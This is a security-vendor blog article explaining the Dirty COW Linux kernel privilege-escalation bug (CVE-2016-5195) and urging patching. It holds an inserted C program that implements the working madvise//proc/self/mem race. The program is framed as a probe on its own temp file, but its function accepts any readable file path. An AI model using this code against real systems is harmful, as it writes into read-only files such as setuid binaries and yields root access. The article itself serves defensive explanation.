In October 2016, a vulnerability called Dirty Cow (CVE-2016-5195) affecting the Linux kernel shook the Free and Open Source Software community. Let us focus on this vulnerability, which is still being actively exploited at the time we write this article.

Dirty Cow: what is it?

The Dirty Cow vulnerability is a local privilege escalation: anyone who can already run unprivileged code on a machine can use it to become root. Combined with another flaw that gives an initial foothold (a compromised web application, for instance), an attacker can thus end up executing code on the targeted machine as the superuser. The bug has been present in the Linux kernel since version 2.6.22 (released in 2007), so every system built on that kernel is affected, Android devices included. That also explains why the flaw has been in the spotlight.

Dirty Cow exploits a race condition in the kernel's Copy-On-Write (COW) handling, hence its name. When a process maps a file it may only read as a private mapping, any write is supposed to land in a private copy of the page, never in the file. By racing a write through /proc/self/mem against madvise(MADV_DONTNEED) on the same page, an attacker gets the kernel to skip that copy and write into the original page cache page, so the change ends up in the file itself. Any file the attacker can read thus becomes writable, including setuid root binaries. For more technical details on the exploitation of this vulnerability, see the “Explaining Dirty COW local root exploit” video by LiveOverflow (12 minutes). According to Phil Oester, the researcher who found the vulnerability, the exploit is reliable and very easy to run. It also leaves no trace in the system's logs, since it only uses ordinary system calls.
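As an added illustration of the race just described (example code written for this edit, not the article's own and not the original proof of concept), the C program below creates a temporary file with known content, maps it read-only and private, then races madvise(MADV_DONTNEED) against writes to the mapping through /proc/self/mem. The outcome of the race reveals the kernel's state: if the payload ends up in the file, the kernel is vulnerable; if the file is intact, the COW copy was made correctly. The iteration count, the temp-file name and the payload are arbitrary choices.

```c
/* Added example, not the article's code: a probe for the Dirty COW race
 * (CVE-2016-5195) using the public proof of concept's technique. A read-only
 * MAP_PRIVATE mapping of a file is raced: one thread drops the private copy with
 * madvise(MADV_DONTNEED) while another writes to the same address through
 * /proc/self/mem. Vulnerable kernel: the write reaches the file. Patched kernel:
 * only the private copy changes. ITERATIONS, temp-file name and payload are
 * arbitrary demo choices. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

#define ITERATIONS 200000

struct race_ctx {
    void *map;           /* private, read-only mapping of the target file */
    const char *payload; /* bytes we try to plant at file offset 0 */
    size_t len;
    long writes_ok;      /* /proc/self/mem writes that returned len */
};

/* Thread 1: keep dropping the private copy so every write must re-fault the
 * page; that re-fault is the window in which the race is won. */
static void *madvise_loop(void *arg)
{
    struct race_ctx *ctx = arg;
    for (int i = 0; i < ITERATIONS; i++)
        madvise(ctx->map, ctx->len, MADV_DONTNEED);
    return NULL;
}

/* Thread 2: /proc/self/mem writes use get_user_pages with FOLL_FORCE, so they may
 * target a PROT_READ mapping (debuggers rely on this). The kernel must hand us a
 * private copy first and never touch the file's own page in the page cache. */
static void *procmem_loop(void *arg)
{
    struct race_ctx *ctx = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) return NULL;
    for (int i = 0; i < ITERATIONS; i++)
        if (pwrite(fd, ctx->payload, ctx->len, (off_t)(uintptr_t)ctx->map) ==
            (ssize_t)ctx->len)
            ctx->writes_ok++;
    close(fd);
    return NULL;
}

/* 1: file content changed (vulnerable); 0: file intact (patched); -1: probe
 * could not run (file too small, mmap failed, /proc/self/mem unusable). */
int dirty_cow_probe(const char *path, const char *payload)
{
    struct race_ctx ctx = { .payload = payload, .len = strlen(payload) };
    struct stat st;
    pthread_t t1, t2;
    char buf[64];
    int fd = open(path, O_RDONLY);
    if (fd < 0 || ctx.len == 0 || ctx.len > sizeof buf || fstat(fd, &st) < 0 ||
        (size_t)st.st_size < ctx.len ||
        (ctx.map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0)) == MAP_FAILED) {
        if (fd >= 0) close(fd);
        return -1;
    }
    int rc1 = pthread_create(&t1, NULL, madvise_loop, &ctx);
    int rc2 = pthread_create(&t2, NULL, procmem_loop, &ctx);
    if (rc1 == 0) pthread_join(t1, NULL);
    if (rc2 == 0) pthread_join(t2, NULL);
    munmap(ctx.map, st.st_size);
    ssize_t n = pread(fd, buf, ctx.len, 0); /* re-read the file, not the map */
    close(fd);
    if (rc1 || rc2 || n != (ssize_t)ctx.len || ctx.writes_ok == 0)
        return -1;
    return memcmp(buf, payload, ctx.len) == 0 ? 1 : 0;
}

/* Constructed target: a file we own, made 0444, holding known content. */
int run_probe_on_tempfile(void)
{
    char path[] = "/tmp/dirtycow-probe-XXXXXX";
    const char original[] = "read-only content that must survive\n";
    int fd = mkstemp(path);
    if (fd < 0) return -1;
    int ok = write(fd, original, sizeof original - 1) == (ssize_t)(sizeof original - 1);
    fchmod(fd, 0444);
    close(fd);
    int result = ok ? dirty_cow_probe(path, "COW-RACE-WON") : -1;
    unlink(path);
    return result;
}

int main(void)
{
    int r = run_probe_on_tempfile();
    puts(r == 1 ? "VULNERABLE: file changed through a read-only private mapping"
         : r == 0 ? "file unchanged: the kernel handled the COW race correctly"
                  : "probe could not run (mmap or /proc/self/mem unavailable)");
    return r < 0 ? 2 : r;
}
```

Compile with gcc -pthread probe.c -o probe and run it as an ordinary user. A clean result after 200,000 iterations is strong evidence but not proof, since the race is probabilistic; a sandbox that forbids writes to /proc/self/mem makes the probe report that it could not run rather than a false "patched". The authoritative check remains your distribution's advisory for CVE-2016-5195.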

To sum up: the Dirty Cow vulnerability is critical, since it allows an attacker to take complete control of a machine or a server. Protecting vulnerable information systems is thus vital, whatever additional protection layers you may have. NBS System's clients, for instance, benefit from a grsecurity kernel, which adds a security layer compared to standard kernels. It makes exploiting the vulnerability harder, but does not guarantee the website's security in the long term.

Why are some machines still vulnerable?

Unlike more “usual” vulnerabilities, found in a web application or a service, Dirty Cow sits in the Linux kernel itself, the heart of the system. Patches have been released for each Linux distribution (Red Hat, Debian, Ubuntu, SUSE), and also for Android devices. Note that distributions backport the fix into their own kernel packages, so the kernel version number alone does not tell you whether a machine is patched: check the machine's kernel package against your distribution's security advisory for CVE-2016-5195.

However, updating a machine, and all the more a whole fleet when complex information systems are concerned, can take some time! That is why many machines are still vulnerable. NBS System has started installing the patches on its infrastructure, and monitors for exploitation of the vulnerability on the machines still waiting for the patch. Thus, if a machine is compromised, our teams can act quickly to prevent the attacker from using it to their advantage. Ask your hosting provider where they stand, and update your own machines!

Lucie Saunois
An IT aficionado, particularly when it comes to cybersecurity, since she joined OT Group in 2015, Lucie specializes in making technical, and often complex, topics understandable to anyone.